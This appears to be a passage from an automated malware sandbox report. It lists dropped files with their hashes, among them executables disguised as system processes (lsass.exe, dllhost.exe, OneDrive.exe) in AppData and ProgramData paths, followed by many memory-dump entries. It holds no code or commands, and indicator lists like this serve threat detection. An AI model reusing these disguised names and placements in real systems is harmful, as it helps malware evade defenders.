afc9dc2e8fc59ccef6090d61ee42c25f

SHA1
abd4364a3c4e297989abcbe361560c92ffa4a3aa

SHA256
f5b371233d235cc12f770ad10e85671b8f42a18236491e359f5567ff05b429e8

SHA512
05a17a8936885effd0f9aabe5bce141acc02523a7553669f090978f1313115a6c565ba41f77d081a4a93c0f32d0c3bd917123f879ecc6e047c88ec912bbab1cd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bfd0fe4af937632288ac78869ac1bf39

SHA1
58518a8bdd2068c8b184582b642797178ac055c9

SHA256
fbc4a8040d61374cd9a6473aced0063195f2ee40798b31013bae8c3f3261ad4e

SHA512
2043a743449eb7aaaa5049a27b326aabdd962ce518d2f58e5c0d90275df93c0e20864156f9f8b81ff1ffe67545488bd981ff4daed1e5753412171bd11b6afce3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bfd0fe4af937632288ac78869ac1bf39

SHA1
58518a8bdd2068c8b184582b642797178ac055c9

SHA256
fbc4a8040d61374cd9a6473aced0063195f2ee40798b31013bae8c3f3261ad4e

SHA512
2043a743449eb7aaaa5049a27b326aabdd962ce518d2f58e5c0d90275df93c0e20864156f9f8b81ff1ffe67545488bd981ff4daed1e5753412171bd11b6afce3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bfd0fe4af937632288ac78869ac1bf39

SHA1
58518a8bdd2068c8b184582b642797178ac055c9

SHA256
fbc4a8040d61374cd9a6473aced0063195f2ee40798b31013bae8c3f3261ad4e

SHA512
2043a743449eb7aaaa5049a27b326aabdd962ce518d2f58e5c0d90275df93c0e20864156f9f8b81ff1ffe67545488bd981ff4daed1e5753412171bd11b6afce3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bfd0fe4af937632288ac78869ac1bf39

SHA1
58518a8bdd2068c8b184582b642797178ac055c9

SHA256
fbc4a8040d61374cd9a6473aced0063195f2ee40798b31013bae8c3f3261ad4e

SHA512
2043a743449eb7aaaa5049a27b326aabdd962ce518d2f58e5c0d90275df93c0e20864156f9f8b81ff1ffe67545488bd981ff4daed1e5753412171bd11b6afce3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bfd0fe4af937632288ac78869ac1bf39

SHA1
58518a8bdd2068c8b184582b642797178ac055c9

SHA256
fbc4a8040d61374cd9a6473aced0063195f2ee40798b31013bae8c3f3261ad4e

SHA512
2043a743449eb7aaaa5049a27b326aabdd962ce518d2f58e5c0d90275df93c0e20864156f9f8b81ff1ffe67545488bd981ff4daed1e5753412171bd11b6afce3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AY87TBJXTRDGYDZGR1FK.temp

Filesize
7KB

MD5
bfd0fe4af937632288ac78869ac1bf39

SHA1
58518a8bdd2068c8b184582b642797178ac055c9

SHA256
fbc4a8040d61374cd9a6473aced0063195f2ee40798b31013bae8c3f3261ad4e

SHA512
2043a743449eb7aaaa5049a27b326aabdd962ce518d2f58e5c0d90275df93c0e20864156f9f8b81ff1ffe67545488bd981ff4daed1e5753412171bd11b6afce3

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe

Filesize
1.6MB

MD5
08e3930a42197a422d064569c4778997

SHA1
74832aa332b48422e5d448f5099b397e84c18712

SHA256
322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813

SHA512
b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe

Filesize
1.6MB

MD5
08e3930a42197a422d064569c4778997

SHA1
74832aa332b48422e5d448f5099b397e84c18712

SHA256
322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813

SHA512
b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

Download Submit
C:\Users\Admin\AppData\Roaming\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\programdata\lsass\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\??\c:\users\admin\appdata\roaming\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\ProgramData\lsass\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
memory/112-168-0x0000000000CF0000-0x0000000001110000-memory.dmp

Filesize
4.1MB

Download
memory/112-137-0x0000000000CF0000-0x0000000001110000-memory.dmp

Filesize
4.1MB

Download
memory/112-143-0x0000000000CF0000-0x0000000001110000-memory.dmp

Filesize
4.1MB

Download
memory/112-149-0x0000000003400000-0x0000000003440000-memory.dmp

Filesize
256KB

Download
memory/304-114-0x000000000246B000-0x00000000024A2000-memory.dmp

Filesize
220KB

Download
memory/304-113-0x0000000002464000-0x0000000002467000-memory.dmp

Filesize
12KB

Download
memory/592-175-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/592-182-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/776-181-0x0000000002AE0000-0x0000000002B20000-memory.dmp

Filesize
256KB

Download
memory/776-172-0x00000000011D0000-0x00000000015F0000-memory.dmp

Filesize
4.1MB

Download
memory/776-214-0x00000000011D0000-0x00000000015F0000-memory.dmp

Filesize
4.1MB

Download
memory/776-210-0x00000000011D0000-0x00000000015F0000-memory.dmp

Filesize
4.1MB

Download
memory/776-205-0x00000000011D0000-0x00000000015F0000-memory.dmp

Filesize
4.1MB

Download
memory/776-201-0x00000000011D0000-0x00000000015F0000-memory.dmp

Filesize
4.1MB

Download
memory/776-197-0x00000000011D0000-0x00000000015F0000-memory.dmp

Filesize
4.1MB

Download
memory/776-193-0x00000000011D0000-0x00000000015F0000-memory.dmp

Filesize
4.1MB

Download
memory/776-190-0x00000000011D0000-0x00000000015F0000-memory.dmp

Filesize
4.1MB

Download
memory/776-185-0x00000000011D0000-0x00000000015F0000-memory.dmp

Filesize
4.1MB

Download
memory/776-180-0x00000000011D0000-0x00000000015F0000-memory.dmp

Filesize
4.1MB

Download
memory/776-167-0x00000000011D0000-0x00000000015F0000-memory.dmp

Filesize
4.1MB

Download
memory/776-179-0x00000000011D0000-0x00000000015F0000-memory.dmp

Filesize
4.1MB

Download
memory/776-170-0x00000000011D0000-0x00000000015F0000-memory.dmp

Filesize
4.1MB

Download
memory/776-173-0x0000000002AE0000-0x0000000002B20000-memory.dmp

Filesize
256KB

Download
memory/936-144-0x0000000002614000-0x0000000002617000-memory.dmp

Filesize
12KB

Download
memory/936-145-0x000000000261B000-0x0000000002652000-memory.dmp

Filesize
220KB

Download
memory/1220-91-0x00000000026F0000-0x00000000026FE000-memory.dmp

Filesize
56KB

Download
memory/1220-84-0x0000000002820000-0x00000000028A0000-memory.dmp

Filesize
512KB

Download
memory/1220-92-0x00000000027A0000-0x00000000027B0000-memory.dmp

Filesize
64KB

Download
memory/1220-89-0x0000000002820000-0x00000000028A0000-memory.dmp

Filesize
512KB

Download
memory/1220-75-0x0000000002220000-0x0000000002228000-memory.dmp

Filesize
32KB

Download
memory/1220-79-0x0000000002820000-0x00000000028A0000-memory.dmp

Filesize
512KB

Download
memory/1220-80-0x0000000002820000-0x00000000028A0000-memory.dmp

Filesize
512KB

Download
memory/1264-86-0x0000000002460000-0x00000000024E0000-memory.dmp

Filesize
512KB

Download
memory/1264-78-0x0000000002460000-0x00000000024E0000-memory.dmp

Filesize
512KB

Download
memory/1264-88-0x000000000246B000-0x00000000024A2000-memory.dmp

Filesize
220KB

Download
memory/1372-95-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/1372-94-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/1372-83-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/1372-82-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/1372-81-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/1372-90-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/1372-98-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/1372-96-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/1552-212-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1552-208-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1552-204-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1552-183-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1552-174-0x0000000000310000-0x0000000000330000-memory.dmp

Filesize
128KB

Download
memory/1552-152-0x00000000001F0000-0x0000000000210000-memory.dmp

Filesize
128KB

Download
memory/1552-200-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1552-177-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1552-196-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1552-192-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1552-188-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1552-186-0x0000000000310000-0x0000000000330000-memory.dmp

Filesize
128KB

Download
memory/1752-184-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1752-198-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1752-213-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1752-209-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1752-126-0x0000000000C30000-0x0000000000C31000-memory.dmp

Filesize
4KB

Download
memory/1752-128-0x0000000000990000-0x0000000000991000-memory.dmp

Filesize
4KB

Download
memory/1752-206-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1752-189-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1752-127-0x0000000000C50000-0x0000000000C51000-memory.dmp

Filesize
4KB

Download
memory/1752-124-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1752-194-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1752-178-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1752-171-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1752-125-0x0000000000C40000-0x0000000000C41000-memory.dmp

Filesize
4KB

Download
memory/1752-202-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1752-176-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1764-54-0x0000000001160000-0x0000000001186000-memory.dmp

Filesize
152KB

Download
memory/1800-122-0x000000013F160000-0x000000013FB2A000-memory.dmp

Filesize
9.8MB

Download
memory/1820-151-0x000000013F860000-0x000000014022A000-memory.dmp

Filesize
9.8MB

Download
memory/2028-74-0x000000001B1E0000-0x000000001B4C2000-memory.dmp

Filesize
2.9MB

Download
memory/2028-87-0x00000000023D0000-0x0000000002450000-memory.dmp

Filesize
512KB

Download
memory/2028-93-0x00000000023D0000-0x0000000002450000-memory.dmp

Filesize
512KB

Download
memory/2028-76-0x00000000023D0000-0x0000000002450000-memory.dmp

Filesize
512KB

Download
memory/2028-77-0x00000000023D0000-0x0000000002450000-memory.dmp

Filesize
512KB

Download
memory/2028-85-0x00000000023D0000-0x0000000002450000-memory.dmp

Filesize
512KB

Download
memory/2028-97-0x00000000023D0000-0x0000000002450000-memory.dmp

Filesize
512KB

Download